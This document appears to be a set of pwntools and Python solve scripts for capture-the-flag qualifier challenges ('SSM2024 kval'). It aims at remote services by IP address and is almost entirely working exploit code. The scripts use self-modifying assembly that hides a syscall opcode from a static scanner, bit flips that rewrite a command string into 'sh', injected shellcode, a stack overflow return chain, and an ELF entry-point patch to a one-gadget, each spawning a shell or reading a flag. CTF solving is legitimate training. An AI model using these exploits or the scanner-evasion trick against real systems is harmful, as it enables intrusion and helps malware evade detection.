SSM2024 kval pwn
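import os
import subprocess

import requests

# Tiny static ELF that runs `/bin/bash -c "cat /flag"` through execve(2).
# No `syscall` opcode is present in the assembled bytes: the two
# `db 0x1, 0x1` bytes right after the XOR are 0x0101, and
# 0x0101 ^ 0x040e = 0x050f, which is `0f 05` (`syscall`) once written back
# little-endian.  The XOR (aimed at those two bytes via `$+12`) patches it in
# at run time, so a static scan of .text never sees the opcode -- presumably
# what the scanner at /scan is looking for.  This only works because the
# binary is linked with `--omagic` below, which leaves .text writable.
SPLOIT_ASM = '''
global _start
section .text
_start:
mov rax, 59 ; execve
mov rdi, fn
mov rsi, argv
mov rdx, 0
; obfuscate syscall
xor QWORD [$+12], 0x40e
db 0x1, 0x1
section .data
fn: db "/bin/bash", 0
a1: db "-c", 0
a2: db "cat /flag", 0
argv: dq fn, a1, a2, 0'''

with open('sploit.S', 'w') as asm_src:
    asm_src.write(SPLOIT_ASM)

# check=True: os.system() threw the exit status away, so a failed assemble or
# link silently left a stale (or missing) ./sploit to be patched and uploaded.
subprocess.run(['nasm', '-f', 'elf64', 'sploit.S', '-o', 'sploit.o'], check=True)
# --omagic makes .text writable (required by the self-modifying XOR above)
subprocess.run(['ld', 'sploit.o', '--omagic', '-o', 'sploit'], check=True)

# Byte 7 of e_ident is EI_OSABI; ld leaves it at 0 (SYSV).  Set it to 3
# (ELFOSABI_GNU/Linux) -- presumably the scanner only accepts that ABI.
with open('sploit', 'r+b') as elf:
    elf.seek(7)
    elf.write(b'\x03')

# Upload the binary to the challenge's scanner and print its verdict.
# The file handle is closed after the request instead of being leaked, and a
# timeout keeps the script from hanging forever on a dead challenge host.
with open('./sploit', 'rb') as payload:
    resp = requests.post(
        'http://46.246.109.16:50000/scan',
        files={'file': payload},
        timeout=30,
    )
print(resp.text)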
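from pwn import *

io = remote('46.246.30.233', 50000)


def flip(off: int) -> None:
    """Ask the service to flip one bit.

    ``off`` is a bit index, i.e. ``8 * byte_offset + bit`` (see the loop below).
    """
    io.sendlineafter(b'flip: ', str(off).encode())


# Rewrite the beginning of the service's command string (this script assumes
# it lives at byte offset 96) so it reads "sh\0" instead of "echo Thank ...".
# zip() stops at the shorter side, so only the first len(tgt) == 3 bytes are
# touched, and within each byte only the bits that actually differ -- the
# minimal number of flips.  A plain loop replaces the side-effect-only list
# comprehension that was here.
src = b'echo Thank you for making my hummus mummus again!'
tgt = b'sh\0'
for i, (have, want) in enumerate(zip(src, tgt)):
    delta = have ^ want
    for bit in range(8):
        if delta & (1 << bit):
            flip(8 * (96 + i) + bit)

# One extra flip: bit 0 of byte 16.  What that byte gates is not visible from
# this script -- presumably whatever makes the service execute the command.
flip(8 * 16)

io.sendline(b'cat flag.txt')
io.interactive()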
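from pwn import *

context.binary = './challenge'
io = remote('46.246.109.134', 50000)

# Insert one record first: the shellcode only runs once per item in the db,
# so an empty db would never execute it.
io.sendlineafter(b'Option: ', b'1')
io.sendlineafter(b'type: ', b'1')
io.sendlineafter(b'size: ', b'1')
io.sendlineafter(b'Data:', b'1')

# Option 3 takes a "query" of a caller-chosen size; we hand it raw shellcode.
io.sendlineafter(b'Option: ', b'3')
sc = asm(shellcraft.amd64.linux.sh())
io.sendlineafter(b'size: ', str(len(sc)).encode())
# sendline appends a '\n' past the declared size, which is harmless as long
# as the service reads exactly `size` bytes.  NOTE(review): if the shellcode
# ever contains 0x0a and the service reads line-wise, switch to send().
io.sendlineafter(b'Query: ', sc)

# Was a str here; pwntools only tolerates that with a bytes/str warning and
# the sibling scripts all send bytes.
io.sendline(b'cat flag.txt')
io.interactive()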
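from pwn import *

context.binary = exe = ELF('./Stack Buffer Overflow 101')
io = remote('46.246.39.26', 50000)

# The binary prints the runtime address of win(); subtracting the static
# symbol recovers the load base so the other symbols resolve too.
io.recvuntil(b'win(): ')
exe.address = int(io.recvline().strip(), 0) - exe.sym.win
# A real load base is page-aligned.  Anything else means the leak was
# mis-parsed and every address in the payload below would be garbage, so
# fail loudly here instead of sending a payload that just crashes the target.
if exe.address & 0xfff:
    log.error('unaligned base %#x -- leak mis-parsed?', exe.address)
log.info('base @ %#x', exe.address)

# 0x28 bytes of filler up to the saved return address, then a two-step
# return chain: set_command() runs first and, assuming it returns normally,
# its `ret` lands in win() (presumably win() acts on what set_command() set).
io.sendline(b'a' * 0x28 + p64(exe.sym.set_command) + p64(exe.sym.win))
io.clean()
io.sendline(b'cat flag.txt')
io.interactive()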
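import base64
from pwn import *

io = remote('46.246.30.193', 50000)

# The service sends its libc as one base64 line and accepts a (modified)
# copy back; presumably it then executes what it receives.
io.recvuntil(b'libc:')
raw = bytearray(base64.b64decode(io.recvline()))
# Make sure we actually read the ELF and not a desynced/truncated line
# before patching header offsets blindly.
if raw[:4] != b'\x7fELF':
    log.error('expected an ELF blob, got %r...', bytes(raw[:16]))

# Offset 0x18 of Elf64_Ehdr is e_entry.  Point it at a one-gadget so that
# running the returned libc spawns a shell directly.  0x4f2a5 is specific to
# this challenge's libc build -- re-derive it with one_gadget if that changes.
raw[0x18:0x18 + 8] = p64(0x4f2a5)
io.sendlineafter(b'(base64): ', base64.b64encode(raw))
io.interactive()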